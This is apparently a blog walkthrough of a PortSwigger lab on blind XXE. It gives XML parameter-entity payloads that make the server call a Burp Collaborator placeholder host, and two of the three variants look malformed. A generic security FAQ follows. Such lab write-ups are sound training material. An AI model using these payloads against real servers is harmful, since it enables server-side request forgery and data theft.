You are currently viewing Blind XXE with out-of-band interaction via XML parameter entities

Blind XXE with out-of-band interaction via XML parameter entities

Information

Hello guys, today in Blind XXE with out-of-band interaction via XML parameter entities we will solve the 4th lab of PortSwigger Web Security. As you know, we are exploring XML or XXE vulnerabilities in a series and solving their practical labs.

In today’s article, we will solve the lab named “Blind XXE with out-of-band interaction via XML parameter entities” in a step-by-step manner.

Lab Description Of Blind XXE with out-of-band interaction via XML parameter entities


In this lab, there is a “check stock” feature that accepts input through XML parsing. The problem here is that it does not display any unexpected values and blocks the request if it contains regular external entities. To solve this lab, we need to create an XML parser through a parameter entity, make a DNS lookup request, and check the result in Burp Suite Collaborator.

Lab Solution

First, access the lab. After accessing the lab, view any product. Once you view the product, you will find a stock check button there. Click on the stock check button and intercept it in Burp Suite.

Blind XXE with out-of-band interaction via XML parameter entities
  1. <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"%xxe;> ]>

Now, take the given external entity definition and insert it between the XML declaration and the stockCheck element, and forward the request.

Blind XXE with out-of-band interaction via XML parameter entities

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

Blind XXE with out-of-band interaction via XML parameter entities

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]> %xxe;

I have used 3 payloads above, out of which one will definitely execute.

Now, we need to check Burp Collaborator to see if any DNS and HTTP requests have been received there or not.

As you can see, we have received requests in Burp Collaborator. Now, let’s check if our lab has been successfully solved or not.

Blind XXE with out-of-band interaction via XML parameter entities

We have successfully solved the lab on Blind XXE with out-of-band interaction via XML parameter entities.

To continue studying check out the next lab i.e. Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD, cover the current lab before visiting the next lab. Good Luck!

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Leave a Reply